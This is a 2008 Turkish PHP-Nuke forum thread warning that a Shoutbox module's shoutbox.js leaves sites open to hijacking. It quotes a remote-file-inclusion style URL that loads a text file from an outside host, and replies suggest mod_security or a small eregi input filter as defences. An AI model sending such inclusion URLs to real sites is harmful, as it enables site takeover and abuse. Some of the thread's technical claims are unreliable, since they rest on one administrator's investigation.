Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 192
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 ME_Haber 2.3..
(110331 okuma, 145 yanıt)
 Resim Galerisi Modülü 2.0..
(123028 okuma, 173 yanıt)
 Ustalardan Bir Ricam Olac..
(13761 okuma, 6 yanıt)
 nukecode.com will close..
(11307 okuma, 5 yanıt)
 super youtube player a lo..
(6410 okuma, 1 yanıt)
 Need good PHP Haber port..
(5667 okuma, 0 yanıt)
 Forum Nasil Tam Sayfa Olu..
(35445 okuma, 40 yanıt)
 Php nuke Forumu Düzenleme..
(10029 okuma, 6 yanıt)
 Yeni Üyelik Aktivasyon Li..
(11086 okuma, 6 yanıt)
 Aşk Flashları Modülü..
(7048 okuma, 2 yanıt)
 resim galeri 2.0 da kateg..
(11533 okuma, 9 yanıt)
 Yeni iki modul: Merhumlar..
(32613 okuma, 36 yanıt)
 ürün tanıtım modülü..
(25432 okuma, 23 yanıt)
 PHP Nuke is out..
(15197 okuma, 13 yanıt)
 MSN Video Bing Video oldu..
(5272 okuma, 0 yanıt)
 haberhit.com..
(5856 okuma, 1 yanıt)
 Bilgi Yarışması 1.0 tama..
(52561 okuma, 72 yanıt)
 Musıc Box elinde olan var..
(6774 okuma, 2 yanıt)
 Online Okey , Batak , Tav..
(174994 okuma, 340 yanıt)
 Emlak Modül ve Blockları ..
(12423 okuma, 8 yanıt)
 WM who ist shampions..
(5114 okuma, 1 yanıt)
 coppermine resim galerisi..
(5548 okuma, 1 yanıt)
 Forumda Teşekkür Eklentis..
(9162 okuma, 7 yanıt)
 free wordpress themes..
(5635 okuma, 1 yanıt)
 JW image rotator for nsn ..
(7738 okuma, 4 yanıt)
 need Iletisim module..
(11129 okuma, 8 yanıt)
 Yeni modul: İletişim modu..
(27905 okuma, 33 yanıt)
 Başvuru Modulu ve Etkinli..
(5904 okuma, 1 yanıt)
 world cup flash..
(5099 okuma, 0 yanıt)
 ..:: Php Nuke FTP link Ha..
(4992 okuma, 0 yanıt)
 yeni phpnuke youtube 2.0..
(5225 okuma, 1 yanıt)
 Content Plus Önceki Konu ..
(4823 okuma, 0 yanıt)
 Php nuke Tickets Modülü..
(8047 okuma, 5 yanıt)
 need help to news time..
(4599 okuma, 0 yanıt)
 NSN News v3.0 new plugin..
(4886 okuma, 0 yanıt)
 how to save flash as imag..
(6123 okuma, 2 yanıt)
 Video Blok Yardım Lütfen...
(6050 okuma, 2 yanıt)
 gazete ara..
(9881 okuma, 5 yanıt)
 Bizim Yazarlar ve Bizim Ş..
(15099 okuma, 14 yanıt)
 Nuke Reflections v2 Türkç..
(14723 okuma, 14 yanıt)
 CNB Your Account 750 442 ..
(14386 okuma, 13 yanıt)
 Admin panelindeki simge ç..
(12461 okuma, 9 yanıt)
 Hosting Modülü..
(14166 okuma, 13 yanıt)
 Bizim şairler Modülü..
(5250 okuma, 1 yanıt)
 new plugin for nsn news v..
(4810 okuma, 1 yanıt)
 php nuke 8.0 türkce dil s..
(6993 okuma, 3 yanıt)
 Kan Bankası Modül istek..
(6228 okuma, 2 yanıt)
 Haber Konulari Sayfasinda..
(5828 okuma, 2 yanıt)
 Kan Bankası Modülünde İsi..
(7137 okuma, 3 yanıt)
 sonhaberler flash block ..
(6697 okuma, 4 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Shoutbox ile birlikte gelen tehlike...
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 

Shoutbox ile birlikte gelen tehlike...

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Modülleri
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
MesajTarih: 2008-07-06, 15:22:41    Mesaj konusu: Shoutbox ile birlikte gelen tehlike... Alıntıyla Cevap Gönder
Bir çok nuke sitesinde kullanılan Shoutbox modül ve blokunla birlikte sitenizi büyük bir tehlike beklemektedir bu tehlike kaynağı modüle ait shoutbox.js nin kendisi olmakla birlikte sitenizde yarattığı açık ile birlikte siteniz tam bir makine gücüne göre saldırı canavarına dönüşmektedir...

sitenizde Shoutbox kullanıyorsanız en kısa sürede bu blok ve ona ait olan herşeyi pasifize edin özellikle shoutbox.js dosyasını sisteminizden kaldırınız....

Zararı: sitenize kişi şu link ile kontak kurarak sitenizi saldırı moduna hazırlamaktadır.

http://www.siteniz.com/index.php?site=http://www.vanderjagt-kraanverhuur.nl/id.txt

bu açığı ise shoutbox.js yaratmaktadır incelemelerimde suç aleti olarak shoutbox.js her alanda çıktı karşıma...

siteniz üzerinden ne gibi saldırılar yaptırabilirler?

Liste: BEAGLE BEAGLE3 BLASTER BOTNETS BOTS BRUTEFORCE
DAMEWARE DEFACEMENT DIPNET DNSBOTS MALWAREURL MYDOOM
NACHI PHATBOT PHISHING ROUTERS SCAN445 SCANNERS
SINIT SLAMMER SPAM SPYBOT TOXBOT

bu araştırmayı neden yaptım?

ismini vermeyeceğim site bize ait makinelerde barındırılıyordu data centerdan rapor geldi raporda sadece site adı geçmekteydi site adından yola çıkarak arştırmalarımı yaptığımda shoutbox.js isimli scriptin bu iş için suç aleti olarak kullanıldığını gördüm...

Uyarı benden dikkate alması sizden...

Not: ilgili site Datacenter a bildirilerek zararlı dosya bulunduğu kaynağından kaldırtılmıştır...

işlemi yapan site ve ilgililer hakkında kanuni işlem yapılacağı ise tarafıma iletilmiştir...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor
Tarih: 2024-06-11, 04:41:06    Mesaj konusu: Forum Arası Reklamlar

Başa dön
sadrazam37
Mesaj: 200+
Mesaj: 200+





Kayıt: Jan 11, 2006
Mesajlar: 266
MesajTarih: 2008-07-06, 15:40:53    Mesaj konusu: Alıntıyla Cevap Gönder
Teşekkürler amanav
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
karaca25
Mesaj: 500+
Mesaj: 500+





Kayıt: Oct 02, 2007
Mesajlar: 717
MesajTarih: 2008-07-06, 16:54:43    Mesaj konusu: Alıntıyla Cevap Gönder
sildim attım sorun kalmadı Very Happy teşekkürler...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
mersoy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Dec 08, 2007
Mesajlar: 2316
MesajTarih: 2008-07-06, 16:59:06    Mesaj konusu: Alıntıyla Cevap Gönder
sentinel yüklüyse problem yok gibi, denedim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mavisce
Editör
Editör





Kayıt: Nov 18, 2005
Mesajlar: 943
Konum: Trabzon/izmir 61-35
MesajTarih: 2008-07-06, 17:12:13    Mesaj konusu: Alıntıyla Cevap Gönder
shoutbox.js dosyasının adı değiştirilirse dosyaya ulaşamazlar ve acık orttadan kalkar dimi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
AHMET_BALCI
Mesaj: 500+
Mesaj: 500+





Kayıt: Apr 10, 2007
Mesajlar: 766
MesajTarih: 2008-07-06, 18:37:06    Mesaj konusu: Alıntıyla Cevap Gönder
nedu zorları
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Ripper
Mesaj: 50+
Mesaj: 50+





Kayıt: Sep 16, 2006
Mesajlar: 66
MesajTarih: 2008-07-06, 23:51:58    Mesaj konusu: Alıntıyla Cevap Gönder
Normal nuke de herşey sonradan yüklenir ve eklenir Bundan dolayı bir çok açıkta beraberinde gelir o dediğiniz saldırı bir çok site üzerinden gelir sadece admin şifresini çalmak için ....
Bunu unutmayalım..
mesela nuke evolution hernekadar php nuke tabanlı olsada bu tür saldırılara karşı gereken önlemler alınmış nedeni ise nuke sentinel tüm modüllere uyarlanmış ve beraberinde ekli olarak gelir gerekli kodlar yapılmış işte bundan dolayı .htaccses te ayrıca kodlar var bu tür saldırılar için .
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir
MesajTarih: 2008-07-07, 08:44:13    Mesaj konusu: Alıntıyla Cevap Gönder
Sunucuda mod_security kurulu ve doğru rules ayarlıysa bu açığın hiçbir anlamı yok. :)
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor
Tarih: 2024-06-11, 04:41:06    Mesaj konusu: Forum Arası Reklamlar

Başa dön
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana
MesajTarih: 2008-07-07, 09:41:19    Mesaj konusu: Alıntıyla Cevap Gönder
Aliosman :
Sunucuda mod_security kurulu ve doğru rules ayarlıysa bu açığın hiçbir anlamı yok. :)


sonuç itibari ile var olan birşey her sunucuda bu olmaz...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir
MesajTarih: 2008-07-07, 10:06:28    Mesaj konusu: Alıntıyla Cevap Gönder
Basit olarak mainfile.php den önlenebilir sanırım.

Örneğin phpnuke 7.6 orjinal sürümde GET metodu ile veriler süzülüyor.

Kod:

       (eregi("<http>]*>", $secvalue)) ||
    (eregi("<privm>]*>", $secvalue)) ||
    (eregi("<url>]*>", $secvalue)) ||



Denemeye çok vaktim olmadı ancak netopsiyon.com alt yapısında benzer bir kodlamam var. Sunucularımızda mod_security rules boş iken faydası oluyordu.

Benim ki bir örnek. Deneyip sonuç ileten olursa sevinirim.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Modülleri Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular
Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Kayan ShoutBox'a Avatar eklentisi... ... ramazanozturk Php Nuke Blocklar 0 2010-05-09, 12:30:44 Son Mesajı Görüntüle
Yeni mesaj yok İçeriği ile birlikte Satılık Domain -... dmg Domain Pazarı 0 2010-04-04, 20:55:10 Son Mesajı Görüntüle
Yeni mesaj yok Foruma Small Shoutbox ahududu NukeBB Eklentileri 0 2010-04-01, 18:18:29 Son Mesajı Görüntüle
Yeni mesaj yok Shoutbox Block ahududu Php Nuke Blocklar 5 2010-03-21, 18:32:49 Son Mesajı Görüntüle
Yeni mesaj yok pms'de gelen mesaj kodu nedir. flk44 Php Nuke Sorunlarınız 1 2010-01-14, 21:47:22 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright